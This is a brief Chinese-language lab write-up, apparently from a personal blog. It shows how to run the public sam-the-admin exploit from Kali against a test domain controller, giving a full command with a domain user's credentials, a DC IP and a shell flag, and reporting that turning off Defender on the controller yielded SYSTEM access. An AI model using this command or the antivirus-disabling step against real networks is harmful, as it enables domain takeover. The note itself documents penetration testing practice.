简单测试一下,刚换系统,环境都没有了,只有之前测的一部分
前置条件:需要一个域用户
kali环境下使用 sam-the-admin
项目进行攻击,只需一条命令
项目地址:https://github.com/WazeHell/sam-the-admin
获取权限Exp
1 python3 sam_the_admin.py "king/windows03w:edcRFV222" -dc-ip 192.168.204.146 -shell
执行发现报错
网上找解决方法,作者说应该是杀软拦截
那我们关闭域控上面的defender尝试一下
关闭defender果然就成功获取到域控的system权限了